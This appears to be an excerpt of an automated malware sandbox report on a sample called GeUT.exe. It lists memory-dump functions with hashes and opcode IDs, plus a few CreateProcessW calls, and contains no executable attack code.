Instruction Fuzzy Hash: 99019C31A062805FC311FB7AD801E9A3BB6CBC9311F00553ED98ACB259EF705904CBA2

Function 06140F89 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 678e817c344b8cef5db1cbabf51bcfa4f1a4747092830b793616bb9e900f84b7
Instruction ID: ce320a1f9f420f850c0049f0daa1d36c0915b432f0d31e40e4c64b53f619c8d1
Opcode Fuzzy Hash: 678e817c344b8cef5db1cbabf51bcfa4f1a4747092830b793616bb9e900f84b7
Instruction Fuzzy Hash: E9519130B00244AFEB98FB75D9557BE76A7AFC8710F148429E802E7395DF349C868B91

Function 06140B18 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b430ddb023c18ebc6c0cf8570f313028968d8c6660b37be23f14869767b7cba3
Instruction ID: e4583ca2953512691f319f3b2c36718dfad073a21a4670758fe71ae6d0f59326
Opcode Fuzzy Hash: b430ddb023c18ebc6c0cf8570f313028968d8c6660b37be23f14869767b7cba3
Instruction Fuzzy Hash: 9D41BC7090524A8FDB10EFAAD940A9AFFF4FF88314F0481AAD108E7351D774A845CFA5

Function 06141470 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f700cb4fa1ed66678c39f1833d50575cfda0b012b005880b1427934915e26580
Instruction ID: aa6a4bf42c749b262db2f3650295106cc9793a8a974cc359fb700cef2ada8f68
Opcode Fuzzy Hash: f700cb4fa1ed66678c39f1833d50575cfda0b012b005880b1427934915e26580
Instruction Fuzzy Hash: 93312821F042445BDB89B7BA88557BE7AD7AFC9710F18812CC142DB389EE748D0683E0

Function 061400E7 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8522de28ea1eff909ad97b892779effa568aef6977128cd698a4d6dd4332e2f
Instruction ID: 1380366f78cc058d203b6f6c2835c68a2f87db5a548f3bfd234911e4b7f2a4fd
Opcode Fuzzy Hash: d8522de28ea1eff909ad97b892779effa568aef6977128cd698a4d6dd4332e2f
Instruction Fuzzy Hash: 76411C74E40209CFEB94EFBAD554BAEBBB1AF4C315F118068D601BB2A1CB35D944CB90

Function 0098D238 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3408121746.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_98d000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 489b2f44dd062767580ae6ef69ef5ec690c4825887dc325b0aa53f9620cc7b3a
Instruction ID: bac864dbe97b5a64d679ed404a3485a548bab7e07f657d6489369d3a3e6e3532
Opcode Fuzzy Hash: 489b2f44dd062767580ae6ef69ef5ec690c4825887dc325b0aa53f9620cc7b3a
Instruction Fuzzy Hash: B721D372505240EFDB15EF14D9C4B2ABB65FB88314F24C669E9094B396C33AD816CBA2

Function 0098D414 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3408121746.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_98d000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 071d257b08ef3ad99f94c503c4ed883a0538a2119de36d5df9bcdc119bc68b9e
Instruction ID: ca5954eef40af6a2c10e415b518c59d7ea22d42ea39289c1ecce506907a819a9
Opcode Fuzzy Hash: 071d257b08ef3ad99f94c503c4ed883a0538a2119de36d5df9bcdc119bc68b9e
Instruction Fuzzy Hash: 6E21E272505240EFDB04AF24D9C0F26BB65FB84324F20C569D9090B3E6C37AE856CBA1

Function 0614310E Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9787aff1c6c585f6571a7789804354b93cdc68ced4c132488529a80be0da73b8
Instruction ID: e3ef61c908ac35dad6499b0316be1ac1900fe70501e62847e93d5093671e70a3
Opcode Fuzzy Hash: 9787aff1c6c585f6571a7789804354b93cdc68ced4c132488529a80be0da73b8
Instruction Fuzzy Hash: 09118135B003119BEF48BB765C257BE26A3ABC4A10F045828ED12BF394DE78A90647A1

Function 00A9D0FC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3409211957.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a9d000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd7ef51034010a6566fcf062f459a7ae9f79af0ed9a68dcbb7d3bd8835aa7726
Instruction ID: bb5e1690fb1d86ff0d9592bff0b6c73f72a4f43fb0cd4fc56b602084fc94815f
Opcode Fuzzy Hash: cd7ef51034010a6566fcf062f459a7ae9f79af0ed9a68dcbb7d3bd8835aa7726
Instruction Fuzzy Hash: E3210476604204EFDF04DF14D9C0B26BBE5FB88314F30C66DD9094B296C77AD886CA61

Function 00A9D2B4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3409211957.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a9d000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8540a1ca1f427b9f8e1150f24919eeb4d58a1a2ac129547fd882205c1738e2be
Instruction ID: 007989936629069a83165124ca5cd334c038ddb3a802e72884d345fbb72912d1
Opcode Fuzzy Hash: 8540a1ca1f427b9f8e1150f24919eeb4d58a1a2ac129547fd882205c1738e2be
Instruction Fuzzy Hash: 24212675604704EFDF04DF14D5C0B2ABBA5FB84314F24C5ADE9094F252C77AD886CA62

Function 00A9D01C Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3409211957.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a9d000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 973419c277dfd818c5fe43fc9877b57e0a042127984f72b3402f2fc1011fa8eb
Instruction ID: b9a91e382c6c5ecb67ba10108a60bbe02f42ee8dd6057f32d828ddac8c466986
Opcode Fuzzy Hash: 973419c277dfd818c5fe43fc9877b57e0a042127984f72b3402f2fc1011fa8eb
Instruction Fuzzy Hash: 1221FF71604300EFDF14DF24D9C0B26BFA5EB84318F20C66DD90A4B292C77AD886CA61

Function 06140C75 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aee441a56e1218ec68ac71c575899e86e8123b210b31934216ba35846432bd55
Instruction ID: a765dfa40b41f0c8a68f91a542b4c4e1df0b5f07e620decfe53613ea6afd0307
Opcode Fuzzy Hash: aee441a56e1218ec68ac71c575899e86e8123b210b31934216ba35846432bd55
Instruction Fuzzy Hash: D821AC78A02500CFC799EF2AD450E69B7B1BF8831131180EDD506CB3B4DB30A806DF81

Function 06140C80 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58e5cfa4c95a639b94f1c557847e1f954765b1d491df7f912d5414f199a608a3
Instruction ID: f884aad54b2da6282742167bd359c5ec4a4b37cbec020f81e70bc8c091448f2f
Opcode Fuzzy Hash: 58e5cfa4c95a639b94f1c557847e1f954765b1d491df7f912d5414f199a608a3
Instruction Fuzzy Hash: FC213578A02500CFC759EF2AD454E29B7B1BF8871631580ADEA06CB3B5DB30A816DF81

Function 00A9D006 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3409211957.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a9d000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80e21d8e2d11cbc69108ddc6a59100e5f7165921a4ee8a8e927718d1fc6e874d
Instruction ID: ffd44abf8f3c44082874242bea6566e6c6b7eb5ee3fa28f8e233054a8cab4178
Opcode Fuzzy Hash: 80e21d8e2d11cbc69108ddc6a59100e5f7165921a4ee8a8e927718d1fc6e874d
Instruction Fuzzy Hash: B82193755093808FDB16CF20D590715BFB1EB45314F28C5EAD8498B6A7C33AD84ACB62

Function 0098D233 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3408121746.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_98d000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45d2786e60e1e4201bb004dcd9f59ae96814e242b2a6b2dda49e09682ea99c03
Instruction ID: be8a2f1f16029ab9949541ef9726c455cf5ee65278fc07df48698a178c76aa4b
Opcode Fuzzy Hash: 45d2786e60e1e4201bb004dcd9f59ae96814e242b2a6b2dda49e09682ea99c03
Instruction Fuzzy Hash: 1721B476504240DFCB16DF10D9C4B1ABF71FB84314F24C5AADC054B656C33AD816CBA2

Function 06140B07 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5213f3a6a7ec28827bb13c00c27fea293fa9f01b0e0c1d89f7e2a7ae98249357
Instruction ID: 95d8aac43e6edf16a0225004666c058846230c9ed8f1c678b18bff599c5af124
Opcode Fuzzy Hash: 5213f3a6a7ec28827bb13c00c27fea293fa9f01b0e0c1d89f7e2a7ae98249357
Instruction Fuzzy Hash: EF11C1746022018FD754EFAAE940A06FBB1FF88309309C1A6C104CB326DB30E896CB95

Function 0098D40F Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3408121746.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_98d000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction ID: 713cc4f0b693d9181dce04e9ff18199fe637150f7af7bc46d325d77f39b51417
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: B811E676504280DFCB15DF10D5C4B16BF72FB94324F24C5A9D8094B7A6C33AE856CBA1

Function 06140D90 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c1b466b91f337d870b736d4ee61f8a3a0c7e735ca7f2e43b0a015a4c367f928
Instruction ID: 61459ae31e2509843af31e8f42287f3799afe5d09eaefcd699e549f36a41ad3d
Opcode Fuzzy Hash: 0c1b466b91f337d870b736d4ee61f8a3a0c7e735ca7f2e43b0a015a4c367f928
Instruction Fuzzy Hash: 8311A174E00115CFCB98EF6AC500AA9BBB1BF09311B2049A9D516DB360D7B1AD4ADF80

Function 00A9D2AF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3409211957.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a9d000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction ID: 67b49d5f395f78be7eb423cb02962b3b077f464c94e5cc17ab69f839efef3e60
Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction Fuzzy Hash: F4119D79604684DFCF05CF10D5C4B1ABBA1FB84318F28C6A9D8494F656C33AD84ACFA2

Function 00A9D0F7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3409211957.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a9d000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction ID: 959fb796f1009ded26899aee228e3e8994f3ce2ae1292225da9efb0e6ef248d5
Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction Fuzzy Hash: D7119D76604284DFDB05CF10D9C4B15BBB1FB84318F24C6AAD8494B656C33AD89ACB61

Function 06140758 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d91162b9cea86bd966ab10920f22ab8453e121f3472bf7028b1c6e557dc9937
Instruction ID: 3a88210040d32310d1f4538db1b828567f71d3fda76ba523afe49207edfd8973
Opcode Fuzzy Hash: 6d91162b9cea86bd966ab10920f22ab8453e121f3472bf7028b1c6e557dc9937
Instruction Fuzzy Hash: 3D01F935B141069FDFA8BB6AD8142EF7BB29B88313F000439DA4567690CF351805CBC2

Function 06140CB1 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8111b389b13a7a32bd0db0709b37987f4d3148c3e20364dcf107620ff65b38bc
Instruction ID: b071b0b8858f60a9d3d6553c7035659e9c2612a6404bc1cb1f73b91cc3dd306f
Opcode Fuzzy Hash: 8111b389b13a7a32bd0db0709b37987f4d3148c3e20364dcf107620ff65b38bc
Instruction Fuzzy Hash: 90113678B02500CFC719EF26E454E18B7A1BF8871631580ADEA028B3B5CB71AC1ADF41

Function 061406C8 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 871fc7ae44d6cc2ab19c1e09ec895f4d41c75014dc9238c65e14f861aaa765e3
Instruction ID: b4cd830441d07462f114c4bf75859767947a1441900eb3a53f9105d12dcbc824
Opcode Fuzzy Hash: 871fc7ae44d6cc2ab19c1e09ec895f4d41c75014dc9238c65e14f861aaa765e3
Instruction Fuzzy Hash: AF0120326022049FC754FB7AE801E9D77EADBC8222F00553DDA0D87254EF706905CBE1

Function 06141C10 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eae6f062e166c32712068819741c3ab8c4e4f028e3542f33fbefa72fbb3341cc
Instruction ID: c149878e611587ab5b9fccfadc1fb13f667fca68930640bb7d000241eab3f08f
Opcode Fuzzy Hash: eae6f062e166c32712068819741c3ab8c4e4f028e3542f33fbefa72fbb3341cc
Instruction Fuzzy Hash: DF1100B58003498FDB60DF9AC985BDEBBF4FF48324F20841AD559A7250C3B5A984CFA5

Function 06141C18 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 149f27d46e640f71382298d8dbefe8d78c207366943054ca5d207820fd3190cd
Instruction ID: 466e0c3d20d65221406964a2d0891826ce14fce4e01532fedca0e3299a2629ea
Opcode Fuzzy Hash: 149f27d46e640f71382298d8dbefe8d78c207366943054ca5d207820fd3190cd
Instruction Fuzzy Hash: 2D1123B58003498FDB10DF9AC985BDEBBF4FF48324F208419D519A3250C3B5A944CFA1

Function 06140CDF Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f29777bdba01112afe3d85999a1aed20ff983469aab10c15400a1df2e6e11897
Instruction ID: 21a83582c09543c1f5bb582588523e8c16d60abda644de01ea7b84da544ee277
Opcode Fuzzy Hash: f29777bdba01112afe3d85999a1aed20ff983469aab10c15400a1df2e6e11897
Instruction Fuzzy Hash: 82014879A12510CFC71AEF26D444E18B7A5FF8871631541ADEA128B3B5CB71AC1ACF41

Function 06140D1B Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0834cd0d7acd0951d7e559aee76472cecb2fb3c6c7aedf2cfc8643a94862cc6d
Instruction ID: e9ca6df0d6a79abab4f2992f2763529354299be252456d1b684d8d8f1ac015c0
Opcode Fuzzy Hash: 0834cd0d7acd0951d7e559aee76472cecb2fb3c6c7aedf2cfc8643a94862cc6d
Instruction Fuzzy Hash: BAF0B83AA00520CFCB19EB72D800A5CB761AB8871631042A9D9124B2B8CBB1AC5ACF80

Function 061425A0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 505778592e8632ebff729d442c14803ffe86facb7f7940cd4fda2fbefcb78e89
Instruction ID: 14e673fd8cd27ada2f4e99ab64a471e0da4f1055dab1d3a3fc3b0b2f6f9f8165
Opcode Fuzzy Hash: 505778592e8632ebff729d442c14803ffe86facb7f7940cd4fda2fbefcb78e89
Instruction Fuzzy Hash: C0D02BB10063028BE307B731F506A913F26DBC0600B009124D40589536DFBC8A1E1AA2

Function 061413A8 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 912654a92dcfdc9d42a71fc69d5d4a004414c90de6dfd0be46a141975b4fc17d
Instruction ID: 5bbd536ad16843cf92b24aaa7cbbb209f05cb01b1232b9886ea4d4f6c8b07217
Opcode Fuzzy Hash: 912654a92dcfdc9d42a71fc69d5d4a004414c90de6dfd0be46a141975b4fc17d
Instruction Fuzzy Hash: D0D09E76A04508DFDB44EBC1E881AEDBB31FB8C335F114512D61123615C7315AA59BD1

Function 061425B0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53e4d11c680b9ad00f2ae39450fa113e5634a972c2bf6a229655aa634ccca1cc
Instruction ID: b683a7b11a776d628a0d23e5354b67460167ad24cad963ed2c4c9ccb1dd7657a
Opcode Fuzzy Hash: 53e4d11c680b9ad00f2ae39450fa113e5634a972c2bf6a229655aa634ccca1cc
Instruction Fuzzy Hash: 46C0C03410020A8BC30AF732F808E043B6AE6C0F00B00A528E10849239DFFC1F0E1FB1

Function 06140D67 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3418699768.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6140000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fa59e13196e1d7dc320eb73dfc52f836a5adf95eebad68ed0c602a899329dcc
Instruction ID: 2f57266c158f6bc519af9aac4ba8e32461c2ca89208157e612e3cc3cce1d7821
Opcode Fuzzy Hash: 6fa59e13196e1d7dc320eb73dfc52f836a5adf95eebad68ed0c602a899329dcc
Instruction Fuzzy Hash: C6C01231A1000487CA04FBF4AC050DCBB20EE80368754076AA22A4E4E1EFA12A268A91

Analysis Process: GeUT.exePID: 3516, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	30.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	46
Total number of Limit Nodes:	4

Executed Functions

Function 01875C6C Relevance: 1.7, APIs: 1, Instructions: 226
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 01875E49

Memory Dump Source

Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d5e8e8f69156ff1885ffa89d6032254354dca51e63069680132bbb5bd1e06c41
Instruction ID: d572c895d273cd5c546eb0c7fc136ae18b271c6583a9a0a87373b474ca1af3f5
Opcode Fuzzy Hash: d5e8e8f69156ff1885ffa89d6032254354dca51e63069680132bbb5bd1e06c41
Instruction Fuzzy Hash: 5781C075D00229DFDF21CFA9C984BEDBBB5BB49300F1091AAE508B7260DB709A85CF54

Function 01874E34 Relevance: 1.7, APIs: 1, Instructions: 226
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 01875011

Memory Dump Source

Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6562aa460b0373c1bf0b42fa23a599ba7a0b1d7058feaf1bd43e1d82615ef6d5
Instruction ID: 38eeac6b11ff0896f50aaa41bf9e8214e3947c07148fad3994fce4af00cabc35
Opcode Fuzzy Hash: 6562aa460b0373c1bf0b42fa23a599ba7a0b1d7058feaf1bd43e1d82615ef6d5
Instruction Fuzzy Hash: 3C81B075D00269DFDF21CFA9C940BEDBBB5BB49304F1091AAE508B7260DB709A89CF54

Function 01871B9C Relevance: 1.7, APIs: 1, Instructions: 225
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 01871D79

Memory Dump Source

Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3e9ccf95e6503a9d06ce54b114f68e038bf53d490642f0a9786f28d7598534e5
Instruction ID: 53325c0b305c251d9137066cd1d7f6ae43c151cf39c8b4ce361560908e7bb6eb
Opcode Fuzzy Hash: 3e9ccf95e6503a9d06ce54b114f68e038bf53d490642f0a9786f28d7598534e5
Instruction Fuzzy Hash: 5281B375D00229DFDF21CFA9C984BDDBBB5BB49304F1091AAE508B7250DB709A85CF54

Function 01876EA4 Relevance: 1.7, APIs: 1, Instructions: 224
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 01877081

Memory Dump Source

Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 546b0fe4ab222e6be74ecb5ee1625df6eeb63f44b994cc34b63cb7bc742ec581
Instruction ID: 96887f4b6a579caf3a52458bb4046d0c450cf3167824f00e7432c129b8a21cf7
Opcode Fuzzy Hash: 546b0fe4ab222e6be74ecb5ee1625df6eeb63f44b994cc34b63cb7bc742ec581
Instruction Fuzzy Hash: DB81C2B5C00269DFDF21CFA9D984BEDBBB5BB09300F1095AAE508B7250DB709A85CF54

Function 0187614C Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 01877EB9

Memory Dump Source

Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0950ca0a6fc4d23799e4572e48f5f11162297997a5db8f133ff37f0e9f86844b
Instruction ID: 25c873452dc0e3c768bc21c523fa7cf20bfc688b670381f459543380dfe6cfe9
Opcode Fuzzy Hash: 0950ca0a6fc4d23799e4572e48f5f11162297997a5db8f133ff37f0e9f86844b
Instruction Fuzzy Hash: EA81CF75C0026DDFDB21DFA9C984BEDBBB5AB49300F1091AAE508B7220DB709A85CF54

Function 01874024 Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 01877081

Memory Dump Source

Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3379693a136a10ee2fc4caac2c1fac8e6b25410cde6e95b9f050297ddb45f698
Instruction ID: abdb6778f1a349d973ab2c41e97c33eee07815f1e315c54653d51ba428ddd7ba
